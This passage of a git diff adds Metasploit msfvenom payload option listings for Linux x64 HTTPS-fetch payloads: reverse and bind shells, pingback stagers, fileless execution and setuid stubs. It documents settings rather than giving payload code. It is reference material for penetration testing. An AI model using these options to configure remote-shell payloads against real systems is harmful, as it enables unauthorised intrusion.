MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-pingback_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x64-pingback_bind_tcp.txt new file mode 100644 index 0000000..ef037c1 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-pingback_bind_tcp.txt @@ -0,0 +1,77 @@ + + Name: HTTPS Fetch, Linux x64 Pingback, Bind TCP Inline + Module: payload/cmd/linux/https/x64/pingback_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME LoTDCnfNFo no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + Accept a connection from attacker and report UUID (Linux x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-pingback_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x64-pingback_reverse_tcp.txt new file mode 100644 index 0000000..45ad231 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-pingback_reverse_tcp.txt @@ -0,0 +1,84 @@ + + Name: HTTPS Fetch, Linux x64 Pingback, Reverse TCP Inline + Module: payload/cmd/linux/https/x64/pingback_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME uEHrdPTZV no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + Connect back to attacker and report UUID (Linux x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-shell-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x64-shell-bind_tcp.txt new file mode 100644 index 0000000..738ffd9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-shell-bind_tcp.txt @@ -0,0 +1,91 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind TCP Stager + Module: payload/cmd/linux/https/x64/shell/bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + Brendan Watters + ricky + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME HEIvAgov no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + Spawn a command shell (staged). + + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-shell-reverse_sctp.txt b/msfvenom/payload_options/cmd-linux-https-x64-shell-reverse_sctp.txt new file mode 100644 index 0000000..aadbed6 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-shell-reverse_sctp.txt @@ -0,0 +1,99 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse SCTP Stager + Module: payload/cmd/linux/https/x64/shell/reverse_sctp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + Brendan Watters + ricky + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME HkOFGQQs no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x64-shell-reverse_tcp.txt new file mode 100644 index 0000000..4897346 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-shell-reverse_tcp.txt @@ -0,0 +1,99 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/https/x64/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 113 + Rank: Normal + +Provided by: + Brendan Watters + ricky + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME fqFlcjcDOza no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-shell_bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x64-shell_bind_ipv6_tcp.txt new file mode 100644 index 0000000..dd85d9c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-shell_bind_ipv6_tcp.txt @@ -0,0 +1,79 @@ + + Name: HTTPS Fetch, Linux x64 Command Shell, Bind TCP Inline (IPv6) + Module: payload/cmd/linux/https/x64/shell_bind_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + Brendan Watters + epi + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME yJDPlNdmUb no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + Listen for an IPv6 connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x64-shell_bind_tcp.txt new file mode 100644 index 0000000..f82aa6d --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-shell_bind_tcp.txt @@ -0,0 +1,79 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/https/x64/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + Brendan Watters + ricky + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME OaQKEeer no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-shell_bind_tcp_random_port.txt b/msfvenom/payload_options/cmd-linux-https-x64-shell_bind_tcp_random_port.txt new file mode 100644 index 